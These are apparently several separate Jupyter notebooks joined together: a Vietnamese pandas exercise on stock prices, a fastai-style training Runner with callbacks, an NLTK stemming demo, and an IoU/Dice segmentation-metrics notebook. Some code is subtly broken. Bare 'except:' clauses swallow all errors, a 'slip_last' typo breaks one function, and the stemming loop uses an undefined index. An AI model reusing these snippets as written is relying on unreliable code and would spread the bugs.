Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } date symbol open high low close volume name employees headquarters_city headquarters_state parsed_time 0 01-03-19 AMZN 1655.13 1674.26 1651.00 1671.73 4974877 AMZN 613300 Seattle WA 2019-01-03 1 04-03-19 AMZN 1685.00 1709.43 1674.36 1696.17 6167358 AMZN 613300 Seattle WA 2019-04-03 2 05-03-19 AMZN 1702.95 1707.80 1689.01 1692.43 3681522 AMZN 613300 Seattle WA 2019-05-03 3 06-03-19 AMZN 1695.97 1709.43 1620.51 1668.95 3996001 AMZN 613300 Seattle WA 2019-06-03 4 07-03-19 AMZN 1667.37 1669.75 1620.51 1625.95 4957017 AMZN 613300 Seattle WA 2019-07-03
###Code
# Câu 8: Thêm cột result, nếu giá 'close' > 'open' thì cột result có giá trị 'up', ngược lại 'down'
###Output
_____no_output_____ |
06_runner2.ipynb | ###Markdown
Runner v2.0> Exception Control FlowWe're now going to rework our Runner.
###Code
#export
from exp.nb_05 import *
# import torch.nn.functional as F
# import torch.nn as nn
# import torch.optim as optim
###Output
_____no_output_____
###Markdown
Get Data
###Code
x_train,y_train,x_valid,y_valid = get_data()
train_ds,valid_ds = Dataset(x_train, y_train),Dataset(x_valid, y_valid)
nh,bs = 50,512
c = y_train.max().item()+1
loss_func = F.cross_entropy
data = DataBunch(*get_dls(train_ds, valid_ds, bs), c)
###Output
_____no_output_____
###Markdown
Callbacks Previously, our `Callback` parent class was
###Code
#export
class Callback():
_order = 0
def set_runner(self, run): self.run = run
def __getattr__(self, k): return getattr(self.run, k)
@property
def name(self):
name = re.sub(r'Callback$', '', self.__class__.__name__)
return camel2snake(name or "callback")
# new to Runner 2.0
def __call__(self, cb_name):
cb = getattr(self, cb_name, None)
if cb and cb(): return True
return False
###Output
_____no_output_____
###Markdown
We're not altering the code for the `TrainEvalCallback` but now it is inheriting from our modified `Callback` parent
###Code
#export
class TrainEvalCallback(Callback):
def begin_fit(self):
self.run.n_epochs = 0.
self.run.n_iter = 0
def after_batch(self):
if not self.in_train:
return
self.run.n_epochs += 1./self.iters
self.run.n_iter += 1
def begin_epoch(self):
self.run.n_epochs = self.epoch
self.model.train()
self.run.in_train = True
def begin_validate(self):
self.model.eval()
self.run.in_train = False
###Output
_____no_output_____
###Markdown
We will define three types of Exceptions that our new Runner will use to control the training loop:
###Code
#export
class CancelTrainException(Exception): pass
class CancelEpochException(Exception): pass
class CancelBatchException(Exception): pass
###Output
_____no_output_____
###Markdown
Runner We're going to remove all of the `if self('some_method')` and instead just call our callbacks:
###Code
#export
class Runner():
def __init__(self, cbs=None, cb_funcs=None):
cbs = listify(cbs)
for cbf in listify(cb_funcs):
cb = cbf()
setattr(self, cb.name, cb)
cbs.append(cb)
self.stop = False
self.cbs = [TrainEvalCallback()]+cbs
@property
def opt(self): return self.learn.opt
@property
def model(self): return self.learn.model
@property
def loss_func(self):return self.learn.loss_func
@property
def data(self):return self.learn.data
def one_batch(self, xb, yb):
try:
self.xb, self.yb = xb, yb
self('begin_batch')
self.pred = self.model(self.xb)
self('after_pred')
self.loss = self.loss_func(self.pred, self.yb)
self('after_loss')
if not self.in_train: return # exits if in validation mode
self.loss.backward()
self('after_backward')
self.opt.step()
self('after_step')
self.opt.zero_grad()
except CancelBatchException: self('after_cancel_batch')
finally: self('after_batch')
def all_batches(self, dl):
self.iters = len(dl)
try:
for xb, yb in dl: self.one_batch(xb, yb)
except: CancelEpochException: self('after_cancel_epoch')
def fit(self, epochs, learn):
self.epochs = epochs
self.learn = learn
self.loss = tensor(0.)
try:
for cb in self.cbs: cb.set_runner(self) # passes self as the runner object to each callback
self("begin_fit")
for epoch in range(epochs):
self.epoch = epoch
if not self('begin_epoch'): self.all_batches(self.data.train_dl)
with torch.no_grad():
if not self('begin_validate'):self.all_batches(self.data.valid_dl)
self('after_epoch')
except: CancelTrainException: self('after_cancel_train')
finally:
self('after_fit')
self.learn = None
def __call__(self, cb_name):
res = False
for cb in sorted(self.cbs, key=lambda x: x._order):
res = cb(cb_name) or res
return res
###Output
_____no_output_____
###Markdown
Other Callbacks TestCallback We now have the ability to completely kill the training in mid-epoch if we reach a certain condition.This is done by simply raising the `CancelTrainException`
###Code
class TestCallback(Callback):
_order=1
def after_step(self):
print(self.n_iter)
if self.n_iter >= 10: raise CancelTrainException()
learn = create_learner(get_model, loss_func, data)
run = Runner(TestCallback())
run.fit(1, learn)
###Output
0
1
2
3
4
5
6
7
8
9
10
###Markdown
Recorder Adding in the recording lrs for multiple param groups. And a new plot function that plots the losses against the lrs.
###Code
#export
class Recorder(Callback):
def begin_fit(self):
self.losses = []
self.lrs = [[] for _ in self.opt.param_groups]
def after_step(self):
if not self.in_train: return
for pg,lr in zip(self.opt.param_groups, self.lrs): lr.append(pg['lr'])
self.losses.append(self.loss.detach().cpu())
def plot_losses(self, skip_last=0):
plt.plot(self.losses[:len(self.losses)-slip_last])
def plot_lr(self, pgid=-1):
plt.plot(self.lrs[pgid])
def plot(self, skip_last=0, pgid=-1):
losses = [o.item() for o in self.losses]
lrs = self.lrs[pgid]
n = len(losses)-skip_last
plt.xscale('log')
plt.plot(lrs[:n], losses[:n])
###Output
_____no_output_____
###Markdown
Param Scheduler Again adding functionality to deal with multiple param groups.
###Code
#export
class ParamScheduler(Callback):
_order = 1
def __init__(self, pname, sched_funcs):
self.pname = pname
self.sched_funcs = sched_funcs
def begin_fit(self):
if not isinstance(self.sched_funcs, (list, tuple)):
self.sched_funcs = [self.sched_funcs] * len(self.opt.param_groups)
def set_param(self):
assert len(self.opt.param_groups)==len(self.sched_funcs) # checking that begin_fit was called
for pg, f in zip(self.opt.param_groups, self.sched_funcs):
pg[self.pname]=f(self.n_epochs/self.epochs) # call the schedule function with the current position
def begin_batch(self):
if self.in_train: self.set_param()
###Output
_____no_output_____
###Markdown
LR Finder LR Finder is supposed to help determine a suitable value for the learning rate.
###Code
#export
class LR_Find(Callback):
_order = 1
def __init__(self, max_iter=100, min_lr = 1e-6, max_lr=10):
self.max_iter = max_iter
self.min_lr = min_lr
self.max_lr = max_lr
self.best_loss = 1e9
def begin_batch(self):
if not self.in_train: return
pos = self.n_iter/self.max_iter
lr = self.min_lr * (self.max_lr/self.min_lr) ** pos
for pg in self.opt.param_groups: pg['lr'] = lr
def after_step(self):
if self.n_iter>=self.max_iter or self.loss>self.best_loss*10:
raise CancelTrainException
if self.loss < self.best_loss: self.best_loss = self.loss
learn = create_learner(get_model, loss_func, data)
###Output
_____no_output_____
###Markdown
AvgStats
###Code
#export
class AvgStatsCallback(Callback):
def __init__(self, metrics):
self.train_stats = AvgStats(metrics, True)
self.valid_stats = AvgStats(metrics, False)
def begin_epoch(self):
self.train_stats.reset()
self.valid_stats.reset()
def after_loss(self):
stats = self.train_stats if self.in_train else self.valid_stats
with torch.no_grad(): stats.accumulate(self.run)
def after_epoch(self):
print(self.train_stats)
print(self.valid_stats)
###Output
_____no_output_____
###Markdown
Test
###Code
run = Runner(cb_funcs=[LR_Find, Recorder])
run.fit(2, learn)
run.recorder.plot(skip_last=10)
run.recorder.plot_lr()
!python notebook2script.py 06_runner2.ipynb
###Output
Converted 06_runner2.ipynb to exp\nb_06.py
|
natural-language-processing/text-preprocessing-level-1/.ipynb_checkpoints/stemming-checkpoint.ipynb | ###Markdown
TEXT PREPROCESSING - STEMMING**Stemming** is text preprocessing techinique where the tokens generated from the corpus are reduced to their base units. The base units need not be meaningful words. This makes it less complex and faster. Manual rule based way of cutting words down.* _go, going, gone --> go_**Overstemming** is when you stem too much of the token.* _universe, university, universities --> univers_**Understemming** is when you dont stem the token enough* datum , data -> dat ==> What about date?**StopWords** are words which do not add much meaning to the sentence.* a, an, the, is
###Code
#will be using NLTK to demonstrate stemming
import nltk
from nltk.stem import PorterStemmer
from nltk.corpus import stopwords
paragraph = """Paragraphs are the building blocks of papers. Many students define paragraphs \
in terms of length. A paragraph is a group of at least five sentences. Paragraph \
is half a page long, etc."""
#generate sentences from the paragraph
sentences = nltk.sent_tokenize(paragraph)
print(sentences)
#initalise stemmer and process each sentence
stemmer = PorterStemmer()
stem_sentences = []
for sentence in sentences:
words = nltk.word_tokenize(sentence)
print("Words before stemming : ", words)
stem_words = []
for word in words:
if word not in set(stopwords.words('english')):
stem_word = stemmer.stem(word)
stem_words.append(stem_word)
sentences[i] = ' '.join(stem_words)
print("Words after stemming : ", stem_words)
print(sentences)
###Output
Words before stemming : ['Paragraph', 'is', 'half', 'a', 'page', 'long', ',', 'etc', '.']
Words after stemming : ['paragraph', 'half', 'page', 'long', ',', 'etc', '.']
Words before stemming : ['Paragraph', 'is', 'half', 'a', 'page', 'long', ',', 'etc', '.']
Words after stemming : ['paragraph', 'half', 'page', 'long', ',', 'etc', '.']
Words before stemming : ['Paragraph', 'is', 'half', 'a', 'page', 'long', ',', 'etc', '.']
Words after stemming : ['paragraph', 'half', 'page', 'long', ',', 'etc', '.']
Words before stemming : ['Paragraph', 'is', 'half', 'a', 'page', 'long', ',', 'etc', '.']
Words after stemming : ['paragraph', 'half', 'page', 'long', ',', 'etc', '.']
['paragraph half page long , etc .', 'paragraph half page long , etc .', 'paragraph half page long , etc .', 'paragraph half page long , etc .']
|
04.ComputerVision/segmentation_metrics_playground.ipynb | ###Markdown
Segmentation MetricsFor each metric I implement a Numpy and a Keras version, and verify that they give the same results. Examples are input images with a squares and circles.
###Code
def metrics_np(y_true, y_pred, metric_name, metric_type='standard', drop_last = True, mean_per_class=False, verbose=False):
"""
Compute mean metrics of two segmentation masks, via numpy.
IoU(A,B) = |A & B| / (| A U B|)
Dice(A,B) = 2*|A & B| / (|A| + |B|)
Args:
y_true: true masks, one-hot encoded.
y_pred: predicted masks, either softmax outputs, or one-hot encoded.
metric_name: metric to be computed, either 'iou' or 'dice'.
metric_type: one of 'standard' (default), 'soft', 'naive'.
In the standard version, y_pred is one-hot encoded and the mean
is taken only over classes that are present (in y_true or y_pred).
The 'soft' version of the metrics are computed without one-hot
encoding y_pred.
The 'naive' version return mean metrics where absent classes contribute
to the class mean as 1.0 (instead of being dropped from the mean).
drop_last = True: boolean flag to drop last class (usually reserved
for background class in semantic segmentation)
mean_per_class = False: return mean along batch axis for each class.
verbose = False: print intermediate results such as intersection, union
(as number of pixels).
Returns:
IoU/Dice of y_true and y_pred, as a float, unless mean_per_class == True
in which case it returns the per-class metric, averaged over the batch.
Inputs are B*W*H*N tensors, with
B = batch size,
W = width,
H = height,
N = number of classes
"""
assert y_true.shape == y_pred.shape, 'Input masks should be same shape, instead are {}, {}'.format(y_true.shape, y_pred.shape)
assert len(y_pred.shape) == 4, 'Inputs should be B*W*H*N tensors, instead have shape {}'.format(y_pred.shape)
flag_soft = (metric_type == 'soft')
flag_naive_mean = (metric_type == 'naive')
num_classes = y_pred.shape[-1]
# if only 1 class, there is no background class and it should never be dropped
drop_last = drop_last and num_classes>1
if not flag_soft:
if num_classes>1:
# get one-hot encoded masks from y_pred (true masks should already be in correct format, do it anyway)
y_pred = np.array([ np.argmax(y_pred, axis=-1)==i for i in range(num_classes) ]).transpose(1,2,3,0)
y_true = np.array([ np.argmax(y_true, axis=-1)==i for i in range(num_classes) ]).transpose(1,2,3,0)
else:
y_pred = (y_pred > 0).astype(int)
y_true = (y_true > 0).astype(int)
# intersection and union shapes are batch_size * n_classes (values = area in pixels)
axes = (1,2) # W,H axes of each image
intersection = np.sum(np.abs(y_pred * y_true), axis=axes) # or, np.logical_and(y_pred, y_true) for one-hot
mask_sum = np.sum(np.abs(y_true), axis=axes) + np.sum(np.abs(y_pred), axis=axes)
union = mask_sum - intersection # or, np.logical_or(y_pred, y_true) for one-hot
if verbose:
print('intersection (pred*true), intersection (pred&true), union (pred+true-inters), union (pred|true)')
print(intersection, np.sum(np.logical_and(y_pred, y_true), axis=axes), union, np.sum(np.logical_or(y_pred, y_true), axis=axes))
smooth = .001
iou = (intersection + smooth) / (union + smooth)
dice = 2*(intersection + smooth)/(mask_sum + smooth)
metric = {'iou': iou, 'dice': dice}[metric_name]
# define mask to be 0 when no pixels are present in either y_true or y_pred, 1 otherwise
mask = np.not_equal(union, 0).astype(int)
# mask = 1 - np.equal(union, 0).astype(int) # True = 1
if drop_last:
metric = metric[:,:-1]
mask = mask[:,:-1]
# return mean metrics: remaining axes are (batch, classes)
# if mean_per_class, average over batch axis only
# if flag_naive_mean, average over absent classes too
if mean_per_class:
if flag_naive_mean:
return np.mean(metric, axis=0)
else:
# mean only over non-absent classes in batch (still return 1 if class absent for whole batch)
return (np.sum(metric * mask, axis=0) + smooth)/(np.sum(mask, axis=0) + smooth)
else:
if flag_naive_mean:
return np.mean(metric)
else:
# mean only over non-absent classes
class_count = np.sum(mask, axis=0)
return np.mean(np.sum(metric * mask, axis=0)[class_count!=0]/(class_count[class_count!=0]))
def mean_iou_np(y_true, y_pred, **kwargs):
"""
Compute mean Intersection over Union of two segmentation masks, via numpy.
Calls metrics_np(y_true, y_pred, metric_name='iou'), see there for allowed kwargs.
"""
return metrics_np(y_true, y_pred, metric_name='iou', **kwargs)
def mean_dice_np(y_true, y_pred, **kwargs):
"""
Compute mean Dice coefficient of two segmentation masks, via numpy.
Calls metrics_np(y_true, y_pred, metric_name='dice'), see there for allowed kwargs.
"""
return metrics_np(y_true, y_pred, metric_name='dice', **kwargs)
# keras version
def seg_metrics(y_true, y_pred, metric_name, metric_type='standard', drop_last = True, mean_per_class=False, verbose=False):
"""
Compute mean metrics of two segmentation masks, via Keras.
IoU(A,B) = |A & B| / (| A U B|)
Dice(A,B) = 2*|A & B| / (|A| + |B|)
Args:
y_true: true masks, one-hot encoded.
y_pred: predicted masks, either softmax outputs, or one-hot encoded.
metric_name: metric to be computed, either 'iou' or 'dice'.
metric_type: one of 'standard' (default), 'soft', 'naive'.
In the standard version, y_pred is one-hot encoded and the mean
is taken only over classes that are present (in y_true or y_pred).
The 'soft' version of the metrics are computed without one-hot
encoding y_pred.
The 'naive' version return mean metrics where absent classes contribute
to the class mean as 1.0 (instead of being dropped from the mean).
drop_last = True: boolean flag to drop last class (usually reserved
for background class in semantic segmentation)
mean_per_class = False: return mean along batch axis for each class.
verbose = False: print intermediate results such as intersection, union
(as number of pixels).
Returns:
IoU/Dice of y_true and y_pred, as a float, unless mean_per_class == True
in which case it returns the per-class metric, averaged over the batch.
Inputs are B*W*H*N tensors, with
B = batch size,
W = width,
H = height,
N = number of classes
"""
flag_soft = (metric_type == 'soft')
flag_naive_mean = (metric_type == 'naive')
# always assume one or more classes
num_classes = K.shape(y_true)[-1]
if not flag_soft:
# get one-hot encoded masks from y_pred (true masks should already be one-hot)
y_pred = K.one_hot(K.argmax(y_pred), num_classes)
y_true = K.one_hot(K.argmax(y_true), num_classes)
# if already one-hot, could have skipped above command
# keras uses float32 instead of float64, would give error down (but numpy arrays or keras.to_categorical gives float64)
y_true = K.cast(y_true, 'float32')
y_pred = K.cast(y_pred, 'float32')
# intersection and union shapes are batch_size * n_classes (values = area in pixels)
axes = (1,2) # W,H axes of each image
intersection = K.sum(K.abs(y_true * y_pred), axis=axes)
mask_sum = K.sum(K.abs(y_true), axis=axes) + K.sum(K.abs(y_pred), axis=axes)
union = mask_sum - intersection # or, np.logical_or(y_pred, y_true) for one-hot
smooth = .001
iou = (intersection + smooth) / (union + smooth)
dice = 2 * (intersection + smooth)/(mask_sum + smooth)
metric = {'iou': iou, 'dice': dice}[metric_name]
# define mask to be 0 when no pixels are present in either y_true or y_pred, 1 otherwise
mask = K.cast(K.not_equal(union, 0), 'float32')
if drop_last:
metric = metric[:,:-1]
mask = mask[:,:-1]
if verbose:
print('intersection, union')
print(K.eval(intersection), K.eval(union))
print(K.eval(intersection/union))
# return mean metrics: remaining axes are (batch, classes)
if flag_naive_mean:
return K.mean(metric)
# take mean only over non-absent classes
class_count = K.sum(mask, axis=0)
non_zero = tf.greater(class_count, 0)
non_zero_sum = tf.boolean_mask(K.sum(metric * mask, axis=0), non_zero)
non_zero_count = tf.boolean_mask(class_count, non_zero)
if verbose:
print('Counts of inputs with class present, metrics for non-absent classes')
print(K.eval(class_count), K.eval(non_zero_sum / non_zero_count))
return K.mean(non_zero_sum / non_zero_count)
def mean_iou(y_true, y_pred, **kwargs):
"""
Compute mean Intersection over Union of two segmentation masks, via Keras.
Calls metrics_k(y_true, y_pred, metric_name='iou'), see there for allowed kwargs.
"""
return seg_metrics(y_true, y_pred, metric_name='iou', **kwargs)
def mean_dice(y_true, y_pred, **kwargs):
"""
Compute mean Dice coefficient of two segmentation masks, via Keras.
Calls metrics_k(y_true, y_pred, metric_name='iou'), see there for allowed kwargs.
"""
return seg_metrics(y_true, y_pred, metric_name='dice', **kwargs)
###Output
_____no_output_____
###Markdown
Input imagesI will build simple geometrical figures and use those as "objects" for assessing segmentation metrics. For example, see below how to generate circles and diamonds with numpy
###Code
x,y = np.meshgrid(np.arange(-7,7.1), np.arange(-7,7.1))
fig, (ax1, ax2) = plt.subplots(1,2,figsize = (13,4))
# ax1.contourf(x, y, circle, alpha=0.5)
# # ax1.scatter(x, y, circle)
# for i in range(len(x)):
# for j in range(len(y)):
# ax1.text(x[i][j], y[i][j], '%d'% circle[i][j], ha='center', va='center')
circle_fuzzy = np.minimum([1], np.maximum([0], 25-x**2-y**2)/20)
ax1.contourf(x, y, circle_fuzzy, alpha=0.4, vmin=0, vmax=1)
# ax1.scatter(x, y, circle_fuzzy)
for i in range(len(x)):
for j in range(len(y)):
fmt = '%d' if circle_fuzzy[i][j] %1 ==0 else '%1.1f'
ax1.text(x[i][j], y[i][j], fmt % circle_fuzzy[i][j] , ha='center', va='center')
diamond = np.minimum([1], np.maximum([0], (3 - abs(x)) + (3 - abs(y)))/3)
ax2.contourf(x,y,diamond, alpha=0.4, vmin=0, vmax=1)
for i in range(len(x)):
for j in range(len(y)):
fmt = '%d' if diamond[i][j] %1 ==0 else '%1.1f'
ax2.text(x[i][j], y[i][j], fmt % diamond[i][j] , ha='center', va='center')
for ax in (ax1, ax2): ax.set_axis_off()
###Output
_____no_output_____
###Markdown
Segmentation masks - for now only do object (circle, diamonds), will add background later on. Truth value mask is zero/one outside/inside of object. Predicted mask has continuous values.
###Code
def fuzzy_circle(xy=(0,0), r=4, fuzz_factor=0.8):
x0, y0 = xy
max_fuzz = fuzz_factor * r**2
circle = np.minimum([1], np.maximum([0], r**2 - (x-x0)**2 - (y-y0)**2)/max_fuzz)
return circle
def fuzzy_diamond(xy=(0,0), r=2, fuzz_factor=1.5):
x0, y0 = xy
max_fuzz = fuzz_factor * r
diamond = np.minimum([1], np.maximum([0], (r - abs(x-x0)) + (r-abs(y-y0)))/max_fuzz)
return diamond
fine_grid = np.meshgrid(np.arange(-7,7.1,0.05), np.arange(-7,7.1,0.05))
x,y = fine_grid
zz = fuzzy_circle((2,0), r=3, fuzz_factor=0.1)
plt.contour(x, y, zz, levels = [0.99], colors='b')
zz = fuzzy_circle((1,1))
plt.contourf(x, y, zz, alpha=0.5, levels=[0,0.25,0.5,0.75,0.99,1.25], cmap = 'gray_r')
zz = fuzzy_diamond(xy=(-3.5,-3.5))
plt.contourf(x, y, zz, alpha=0.5, levels=[0,0.25,0.5,0.75,0.99,1.25], cmap = 'gray_r')
plt.gca().set_aspect(1)
plt.gca().set_axis_off()
###Output
_____no_output_____
###Markdown
Compute IoU and Dice metrics for series of two overlapping circles
###Code
fig, axes = plt.subplots(1,3, figsize = (13,4))
params = [((0,0), 4), ((2,0), 4, ), ((2,0), 2) ]
y_true = fuzzy_circle(fuzz_factor=0.01)
print('{:<10s} {:<10s} {:<10s}'.format('','explicit', 'np function'))
for i in range(len(axes)):
axes[i].scatter(0,0, c='b')
axes[i].add_artist(plt.Circle((0, 0), 4.05, lw=2, edgecolor='b', facecolor=(0,0,1,0.3), zorder=1))
xy, r = params[i]
axes[i].scatter(*xy, c='r')
axes[i].add_artist(plt.Circle(xy, r, lw=2, ls='--', edgecolor='r', facecolor=(1,0,0,0.3), zorder=1))
smooth = 0.001
y_pred = fuzzy_circle(xy, r, 0.01)
intersection = np.sum(np.logical_and(y_true, y_pred))
union = np.sum(np.logical_or(y_pred, y_true))
iou = np.mean((intersection)/union)
dice = 2*np.mean(intersection/(np.sum(y_pred)+np.sum(y_true)))
print('{:<10s} {:<10.2f} {:<10.2f}'.format('IoU', iou, metrics_np(np.reshape(y_true, (1,)+y_true.shape+(1,)), np.reshape(y_pred, (1,)+y_pred.shape+(1,)), metric_name = 'iou')))
print('{:<10s} {:<10.2f} {:<10.2f}'.format('Dice', dice, metrics_np(np.reshape(y_true, (1,)+y_true.shape+(1,)), np.reshape(y_pred, (1,)+y_pred.shape+(1,)), metric_name = 'dice')))
axes[i].text(0,5, f'IoU={iou:1.2f}\nDice={dice:1.2f}', ha='center')
axes[i].set_axis_off()
axes[i].set(aspect=1, xlim=(-5,6.1), ylim=(-5,6))
fig.savefig('metrics_iou_dice.png',bbox_inches='tight')
x,y = fine_grid
fig, axes = plt.subplots(1,4, figsize = (16,4))
params = [((0,0), 4, 0.8), ((0,0), 4, 1), ((2,0), 4, 0.8), ((2,0), 2, 0.8) ]
y_true = fuzzy_circle(fuzz_factor=0.01)
print('{:<10s} {:<10s} {:<10s}'.format('','explicit', 'np function'))
for i in range(len(axes)):
# axes[i].contour(x, y, y_true, levels = [0.99], colors='b')
axes[i].add_artist(plt.Circle((0, 0), 4, lw=2, edgecolor='b', facecolor=(0,0,0,0), zorder=1))
xy, r, fuzz_factor = params[i]
y_pred = fuzzy_circle(xy, r, fuzz_factor)
# axes[i].contourf(x, y, y_pred, alpha=0.5, levels=[0.01,0.5,0.99,1.25], cmap = 'gray_r')
axes[i].pcolormesh(x, y, y_pred, alpha=0.3, shading='gouraud', cmap = 'gray_r')
cs = axes[i].contour(x, y, y_pred, levels=[0.01,0.5,0.99,1.25], colors = 'k')
axes[i].clabel(cs, fmt='%1.1f')
intersection = np.sum(np.logical_and(y_true, y_pred))
union = np.sum(np.logical_or(y_pred, y_true))
iou = np.mean(intersection/union)
intersection_soft = np.sum(np.abs(y_true * y_pred))
union_soft = np.sum(np.abs(y_pred)) + np.sum(np.abs(y_true)) - intersection_soft
iou_soft = np.mean(intersection_soft/union_soft)
print('{:<10s} {:<10.2f} {:<10.2f}'.format('IoU',iou, metrics_np(np.reshape(y_true, (1,)+y_true.shape+(1,)), np.reshape(y_pred, (1,)+y_pred.shape+(1,)), metric_name='iou')))
print('{:<10s} {:<10.2f} {:<10.2f}'.format('soft IoU',iou_soft, metrics_np(np.reshape(y_true, (1,)+y_true.shape+(1,)), np.reshape(y_pred, (1,)+y_pred.shape+(1,)),metric_name='iou', metric_type='soft')))
axes[i].text(0,5, f'IoU={iou:1.2f}\nsoft IoU={iou_soft:1.2f}', ha='center')
axes[i].set_axis_off()
axes[i].set(aspect=1)
fig.savefig('metrics_iou_dice_soft.png',bbox_inches='tight')
y_true = fuzzy_circle(fuzz_factor=0.01)
y_pred = fuzzy_circle((2,0), 4, 0.8)
fig, axes = plt.subplots(1,3, figsize=(9,3))
for ax in axes:
ax.set_axis_off(); ax.set(aspect=1)
ax.add_artist(plt.Circle((0, 0), 4, lw=2, edgecolor='b', facecolor=(0,0,0,0), zorder=1))
ax.text(-2,4,'True\n mask', ha='center', va='bottom', color='b')
ax.add_artist(plt.Circle((2, 0), 4, lw=2, edgecolor='r', facecolor=(0,0,0,0), zorder=1))
ax.text(4,4,'Predicted\n mask', ha='center', va='bottom', color='r')
iax=list(axes).index(ax)
if iax>0:
axes[iax].annotate(['hard ','soft '][iax-1]+'intersection', (1,-2), xytext=(0,-6), ha='center', arrowprops={'arrowstyle': '->', 'color':'y'}, zorder=2)
axes[0].pcolormesh(x,y, y_pred, cmap='gray_r')
axes[1].pcolormesh(x,y, np.logical_and(y_true, y_pred), cmap='gray_r')
axes[2].pcolormesh(x,y, y_true * y_pred, cmap='gray_r');
fig.savefig('metrics_intersection_soft.png',bbox_inches='tight')
###Output
_____no_output_____
###Markdown
To test the non-naive mean_IoU, I need multiple classes, the masks of which overlap for only a small subset. I will arbitrarily take a circle and a diamond as examples of two classes, offset them a little and then find the IoU's
###Code
x,y = fine_grid
true1 = fuzzy_circle(xy=(2,0), fuzz_factor=0.01)
pred1 = fuzzy_circle(xy=(3,0))
# two instances of Diamond class: first has IoU=0.33 (half overlap), second one has IoU=0.24
true2 = fuzzy_diamond(xy=(-4,-2),r=1,fuzz_factor=0.01) + fuzzy_diamond(xy=(-3.5,3),r=1,fuzz_factor=0.01)
pred2 = fuzzy_diamond(xy=(-5,-3),r=1) + fuzzy_diamond(xy=(-5,3),r=1)
empty = np.zeros_like(true1)
plt.contour(x,y,true1, colors='r')
plt.contour(x,y,true2, colors='b')
plt.pcolormesh(x,y,pred1, cmap=mpl.colors.ListedColormap([(0,0,0,0)]+list(map(plt.get_cmap('Oranges'), range(256)))[1:]))
plt.pcolormesh(x,y,pred2, cmap=mpl.colors.ListedColormap([(0,0,0,0)]+list(map(plt.get_cmap('Purples'), range(256)))[1:]))
plt.gca().set_axis_off()
plt.gca().set(aspect=1)
y_true = np.expand_dims(np.stack([true1, true2, empty, empty, (true1==0) & (true2==0).astype(int)], axis=-1), axis=0)
y_pred = np.expand_dims(np.stack([pred1, pred2, empty, empty, (pred1==0) & (pred2==0).astype(int)], axis=-1), axis=0)
print('{:<60s} {:.3f}'.format('IoU of first class:', metrics_np(y_true[:,:,:,:1], y_pred[:,:,:,:1], metric_name='iou')))
print('{:<60s} {:.3f}'.format('IoU of second class:', metrics_np(y_true[:,:,:,1:2], y_pred[:,:,:,1:2], metric_name='iou')))
print('{:<60s} {:.3f}'.format('IoU of background:', metrics_np(y_true[:,:,:,-1:], y_pred[:,:,:,-1:], metric_name='iou')))
print('{:<60s} {}'.format('IoU of each class (explicit list):', metrics_np(y_true, y_pred, metric_name='iou', metric_type='naive', drop_last=False, mean_per_class=True)))
print('{:<60s} {:.3f}'.format('mean IoU of all classes (no background, naive mean):', metrics_np(y_true, y_pred, metric_name='iou', metric_type='naive')))
print('{:<60s} {:.3f}'.format('mean IoU of all classes (with background, naive mean):', metrics_np(y_true, y_pred, metric_name='iou', metric_type='naive', drop_last = False)))
print('{:<60s} {:.3f}'.format('mean IoU of all non-absent classes (dropping background):', metrics_np(y_true, y_pred, metric_name='iou')))
plt.text(5,6,'Circle\nIoU={:1.2f}'.format(metrics_np(y_true[:,:,:,:1], y_pred[:,:,:,:1], metric_name='iou')), color='r', ha='center', va='center')
plt.text(-5,6,'Diamond\nIoU={:1.2f}'.format(metrics_np(y_true[:,:,:,1:2], y_pred[:,:,:,1:2], metric_name='iou')), color='b', ha='center', va='center')
plt.text(0,-5,'mean IoU={:1.2f}'.format(metrics_np(y_true, y_pred, metric_name='iou')), ha='center', va='bottom');
plt.savefig('metrics_mean_iou_multiclass.png', bbox_inches='tight')
###Output
IoU of first class: 0.726
IoU of second class: 0.286
IoU of background: 0.775
IoU of each class (explicit list): [0.72645972 0.28643223 1. 1. 0.7748001 ]
mean IoU of all classes (no background, naive mean): 0.753
mean IoU of all classes (with background, naive mean): 0.758
mean IoU of all non-absent classes (dropping background): 0.506
###Markdown
So far I have used `batch_size=1`. Test the difference between naive and standard ways to take the mean, for multiple examples. Here I will take two images, the first with two classes as above and the second one with only the circle.
###Code
y_true = np.stack([np.stack([true1, true2, empty, empty, (true1==0) & (true2==0).astype(int)], axis=-1),
np.stack([true1, empty, empty, empty, (true1==0)], axis=-1)])
y_pred = np.stack([np.stack([pred1, pred2, empty, empty, (pred1==0) & (pred2==0).astype(int)], axis=-1),
np.stack([pred1, empty, empty, empty, (pred1==0)], axis=-1)])
print('Naive per-class mean: {} -- Overall mean: {:1.2f}'.format(
metrics_np(y_true, y_pred, metric_name='iou', metric_type='naive', mean_per_class=True),
metrics_np(y_true, y_pred, metric_name='iou', metric_type='naive')))
print('Standard per-class mean: {} -- Overall mean: {:1.2f}'.format(
metrics_np(y_true, y_pred, metric_name='iou', mean_per_class=True),
metrics_np(y_true, y_pred, metric_name='iou')))
print('Standard per-class mean, with background', metrics_np(y_true, y_pred, metric_name='iou', mean_per_class=True, drop_last=False))
# metrics_np(y_true, y_pred, metric_name='iou', mean_per_class=True),\
# metrics_np(y_true, y_pred, metric_name='iou'),\
print('Soft per-class mean ', metrics_np(y_true, y_pred, metric_name='iou', metric_type='soft', mean_per_class=True))
###Output
Naive per-class mean: [0.72645972 0.64321612 1. 1. ] -- Overall mean: 0.84
Standard per-class mean: [0.72659643 0.28714509 1. 1. ] -- Overall mean: 0.51
Standard per-class mean, with background [0.72659643 0.28714509 1. 1. 0.83668973]
Soft per-class mean [0.54782264 0.17182951 1. 1. ]
###Markdown
Test Keras version and verify it gives same result as Numpy
###Code
print('hard IoU {:1.6f} {:1.6f}'.format(metrics_np(y_true, y_pred, metric_name='iou'),
K.eval(seg_metrics(y_true, y_pred, metric_name='iou'))))
print('soft IoU {:1.6f} {:1.6f}'.format(metrics_np(y_true, y_pred, metric_name='iou', metric_type='soft'),
K.eval(seg_metrics(y_true, y_pred, metric_name='iou', metric_type='soft'))))
print('hard IoU, naive mean {:1.6f} {:1.6f}'.format(metrics_np(y_true, y_pred, metric_name='iou', metric_type='naive'),
K.eval(seg_metrics(y_true, y_pred, metric_name='iou', metric_type='naive'))))
print('hard Dice {:1.6f} {:1.6f}'.format(metrics_np(y_true, y_pred, metric_name='dice'),
K.eval(seg_metrics(y_true, y_pred, metric_name='dice'))))
###Output
hard IoU 0.506446 0.506446
soft IoU 0.359299 0.359298
hard IoU, naive mean 0.842419 0.842419
hard Dice 0.643436 0.643436
###Markdown
